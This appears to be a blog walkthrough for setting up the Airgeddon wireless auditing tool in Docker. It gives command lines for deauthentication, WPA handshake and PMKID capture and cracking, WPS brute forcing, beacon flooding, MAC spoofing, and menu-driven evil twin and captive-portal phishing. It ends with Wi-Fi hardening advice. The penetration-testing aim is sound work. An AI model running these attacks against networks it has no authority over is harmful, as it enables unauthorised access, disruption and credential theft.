Skip to content

Airgeddon: Setup & Use Walkthrough

swissarmyknife-chacho

Airgeddon is essentially a Swiss Army knife for wireless network auditing, without the risk of nicking your fingers. It's a multi-use bash script that does everything from monitoring to cracking Wi-Fi networks, offering several tools wrapped in one streamlined interface. Trusting your network security to luck is like using a paper umbrella in a hurricane— optimistic, but impractical. This post will focus on the use of Airgeddon to poke at your Wi-Fi networks and then implement more secure practices that will harden your Wi-Fi, saving the paper umbrella for a mai tai.

This covers the setup of Airgeddon in a Docker container and the usage of various plugins to enhance your wireless network testing and auditing capabilities. Ensure to follow legal and ethical guidelines while using these tools.

Git Hub Repo

Essential Tools

1. Install Docker:

Ensure Docker is installed and running on your system.

2. Optional: Create a Custom Dockerfile (if you want to customize the image):

  • Create directory 

    mkdir airgeddon-docker && cd airgeddon-docker

  • Create Dockerfile: 

    FROM kalilinux/kali-rolling

RUN apt-get update && \
    apt-get install -y git iw net-tools wireless-tools aircrack-ng reaver macchanger mdk3 gpsd kismet

RUN git clone https://github.com/v1s1t0r1sh3r3/airgeddon.git /opt/airgeddon

WORKDIR /opt/airgeddon

ENTRYPOINT ["./airgeddon.sh"]

  • Build Docker image: 

    docker build -t custom-airgeddon .

3. Run the Container:

  • If using the pre-built image: 
    docker run \
  --rm \
  -ti \
  --name airgeddon \
  --net=host \
  --privileged \
  -p 3000:3000 \
  -v /path/to/some/dir/on/your/host:/io \
  -e DISPLAY=$(ifconfig en0 | grep inet | awk '$1=="inet" {print $2}'):0 \
  v1s1t0r1sh3r3/airgeddon
  • If using the custom-built image: 
    docker run \
  --rm \
  -ti \
  --name airgeddon \
  --net=host \
  --privileged \
  -p 3000:3000 \
  -v /path/to/some/dir/on/your/host:/io \
  -e DISPLAY=$(ifconfig en0 | grep inet | awk '$1=="inet" {print $2}'):0 \
  custom-airgeddon

4. Install Additional Dependencies

  • Airgeddon will prompt you to install any missing dependencies when you run it for the first time: 
    sudo ./airgeddon.sh

Monitor Mode Management

5. Enable Monitor Mode

  • Use tools like airmon-ng to enable monitor mode on your wireless adapter: 
    sudo airmon-ng start wlan0
  • Verify monitor mode is enabled: 
    sudo iwconfig

Network Scanner

6. Scan for Wi-Fi Networks

  • Use airodump-ng to scan for available networks: 
    sudo airodump-ng wlan0mon
  • Note down details like BSSID, channel, encryption type, and signal strength.

Handshake Tools

7. Capture WPA/WPA2 Handshakes

  • Run airodump-ng to capture handshakes: 
    sudo airodump-ng --bssid <BSSID> --channel <channel> -w <output_file> wlan0mon
  • Perform a deauthentication attack to force a handshake: 
    sudo aireplay-ng --deauth 10 -a <BSSID> wlan0mon

8. Clean and Verify Handshakes

  • Use tools like wpaclean to clean captured handshakes: 
    wpaclean <cleaned_output_file> <raw_capture_file>

9. Decrypt Handshakes Offline

  • Use aircrack-ng for dictionary or brute-force attacks: 
    aircrack-ng -w <wordlist> -b <BSSID> <capture_file>

MITM (Man-In-The-Middle) Attacks

10. Evil Twin Attack

  • Create a rogue access point mimicking a legitimate network using airgeddon: 
    sudo ./airgeddon.sh
  • Follow the interactive menu to set up an Evil Twin attack.

11. Captive Portal

  • Set up a fake access point with a phishing page using the captive portal feature in Airgeddon: 
    sudo ./airgeddon.sh
  • Select "Captive Portal" from the menu and configure it.

12. Rogue DHCP

  • Configure a rogue DHCP server to manipulate DNS requests: 
    sudo ./airgeddon.sh
  • Choose the appropriate option for setting up a rogue DHCP server.

Other Wireless Attacks

13. Deauthentication and Disassociation

  • Use aireplay-ng for deauthentication attacks: 
    sudo aireplay-ng --deauth 0 -a <BSSID> wlan0mon

14. Beacon Flooding

  • Use mdk3 for beacon flooding: 
    sudo mdk3 wlan0mon b -f <SSID_file>

15. PKMID Clientless Attack

  • Use tools like hcxdumptool and hcxpcaptool for PKMID attacks: 
    sudo hcxdumptool -i wlan0mon -o dumpfile.pcapng --enable_status=1
sudo hcxpcaptool -z <hash_file> dumpfile.pcapng

Testing and Auditing

16. WPS Attacks

  • Use reaver or bully for WPS attacks: 
    sudo reaver -i wlan0mon -b <BSSID> -vv

17. Known Vulnerabilities Checker

  • Use Airgeddon’s built-in vulnerability checker: 
    sudo ./airgeddon.sh
  • Select "Known Vulnerabilities Checker" from the menu.

18. Wireless Network Auditing

  • Perform comprehensive network auditing using Airgeddon: 
    sudo ./airgeddon.sh
  • Choose the "Wireless Network Auditing" option.

Miscellaneous Tools

19. MAC Address Spoofing

  • Change your device’s MAC address using macchanger: 
    sudo ifconfig wlan0 down
sudo macchanger -r wlan0
sudo ifconfig wlan0 up

20. GPS Tracking

  • Track and log GPS data using gpsd and kismet: 
    sudo gpsd /dev/ttyUSB0 -F /var/run/gpsd.sock
sudo kismet

21. Interface and Dependency Management

  • Use Airgeddon to manage wireless interfaces and check/install dependencies: 
    sudo ./airgeddon.sh

Interface and Visual Tools

22. Airgeddon Plugins

  • Extend Airgeddon functionality with plugins: 
    sudo ./airgeddon.sh
  • Select the "Plugins" option from the menu.

Using Airgeddon Plugins

1. OnlineHashCrack Plugin

  • Purpose: Integrates with the OnlineHashCrack service, allowing users to send captured WPA handshakes or PMKIDs directly from Airgeddon to the online service for remote cracking.
  • Use Case: Useful for users who don’t have the resources to perform intensive local cracking but want to verify the strength of their passwords.

Steps: 1. Capture WPA Handshake or PMKID: - Follow the standard procedure to capture a WPA handshake or PMKID using Airgeddon: 

sudo ./airgeddon.sh
- Select the appropriate option to capture a handshake or PMKID.

  1. Use OnlineHashCrack Plugin:
  2. From the Airgeddon main menu, navigate to "Plugins".
  3. Select "OnlineHashCrack Plugin".
  4. Follow the prompts to upload the captured handshake or PMKID to the OnlineHashCrack service.
  5. Monitor the progress and results directly through the plugin interface.

2. Telegram Bot Plugin

  • Purpose: Sends notifications and results directly to a Telegram bot, enabling real-time monitoring of Airgeddon processes.
  • Use Case: Ideal for long-running attacks or monitoring, where the user might not be directly in front of the terminal but wants updates on the testing status.

Steps: 1. Set Up Telegram Bot: - Create a Telegram bot by talking to BotFather. - Note down the bot token provided by BotFather.

  1. Configure Telegram Bot Plugin in Airgeddon:
  2. Run Airgeddon: 
    sudo ./airgeddon.sh
  3. Navigate to "Plugins" and select "Telegram Bot Plugin".
  4. Enter the bot token and your Telegram user ID when prompted.

  5. Enable notifications for specific Airgeddon processes as desired.

  6. Monitor Notifications:

  7. Start an Airgeddon attack or process.
  8. Receive real-time updates and results directly on your Telegram app.

3. 5GHz Supported Channels Plugin

  • Purpose: Adds a feature to check the 5 GHz channels supported by your Wi-Fi adapter, which can be crucial for planning attacks or tests on networks operating in the 5 GHz band.
  • Use Case: Helps users understand their hardware capabilities better and optimize their testing strategy for 5 GHz networks.

Steps: 1. Run Airgeddon: 

sudo ./airgeddon.sh

  1. Check 5GHz Channels:
  2. From the Airgeddon main menu, navigate to "Plugins".
  3. Select "5GHz Supported Channels Plugin".
  4. The plugin will list the 5 GHz channels supported by your Wi-Fi adapter.
  5. Use this information to plan your attacks or tests on 5 GHz networks.

4. IP GeoLocation Plugin

  • Purpose: Adds the ability to geolocate IPs associated with the network being audited, providing additional context about the network and potential security risks.
  • Use Case: Useful in scenarios where network auditing involves analysis of access locations or in tracing IP origins for more advanced security assessments.

Steps: 1. Run Airgeddon: 

sudo ./airgeddon.sh

  1. Use IP GeoLocation Plugin:
  2. From the Airgeddon main menu, navigate to "Plugins".
  3. Select "IP GeoLocation Plugin".
  4. Enter the IP addresses you want to geolocate.
  5. The plugin will provide geolocation information for the entered IPs.

5. WPS PIN Companion

  • Purpose: Enhances the WPS features of Airgeddon by adding more sophisticated WPS PIN attack techniques, improving the chances of discovering the WPS PIN of a router.
  • Use Case: Enhances WPS vulnerability testing, critical for assessing the security of WPS-enabled networks, especially those using predictable PIN generation algorithms.

Steps: 1. Run Airgeddon: 

sudo ./airgeddon.sh

  1. Use WPS PIN Companion:
  2. From the Airgeddon main menu, navigate to "Plugins".
  3. Select "WPS PIN Companion".
  4. Follow the prompts to perform advanced WPS PIN attacks on target routers.
  5. The plugin will use sophisticated techniques to improve the chances of discovering the WPS PIN.

Hardening Wi-Fi

Here are some steps and considerations that can help harden a Wi-Fi network so that it is less succeptible to tools like Airgeddon: To fortify your Wi-Fi network and make it more resilient against tools like Airgeddon, consider implementing the following security measures:

1. Use Strong Encryption

  • WPA3: Upgrade to WPA3 encryption, which provides enhanced security compared to WPA2.
  • WPA2: If WPA3 is not available, use WPA2 with a strong, complex password (at least 12-16 characters, including numbers, letters, and special characters).

2. Disable WPS

  • WPS (Wi-Fi Protected Setup): Disable WPS on your router so that it cannot be used for brute-force attacks.

3. Use a Strong and Unique Password

  • SSID Password: Create a strong, unique password for your Wi-Fi network. Avoid common words, phrases, or easily guessable information.

4. Regularly Update Firmware

  • Router Firmware: Regularly update your router’s firmware to ensure you have the latest security patches and features.

5. Change Default Router Settings

  • Default SSID: Change the default SSID to something unique and not easily associated with your hardware brand.
  • Default Password: Change the default administrative password to something strong and unique.

6. Enable Network Segmentation

  • Guest Network: Create a separate guest network for visitors and IoT devices. This isolates your main network from potential vulnerabilities in guest devices.

7. Reduce Signal Strength

  • Router Placement: Place your router in a central location and reduce the signal strength to limit the Wi-Fi range to your premises.

8. Enable MAC Address Filtering

  • MAC Filtering: Enable MAC address filtering to restrict network access to known devices. This is not foolproof but adds an extra layer of security.

9. Monitor Network Traffic

  • Network Monitoring Tools: Use network monitoring tools to detect and respond to unusual activity. Many modern routers have built-in monitoring features.

10. Use VPN for Additional Encryption

  • VPN: Use a VPN to encrypt data traffic. This helps protect your information from being intercepted, especially on public or untrusted networks.

11. Disable Unnecessary Features

  • Unused Services: Disable any services or features you do not use, such as remote management or UPnP (Universal Plug and Play).

12. Implement Intrusion Detection and Prevention Systems (IDPS)

  • IDPS: Use IDPS to detect and block malicious activities on your network.

13. Educate Users

  • Security Awareness: Educate users on the importance of network security, strong passwords, and recognizing phishing attempts.

By combining these measures, you can significantly enhance the security of your Wi-Fi network and reduce the effectiveness of tools like Airgeddon in extracting information.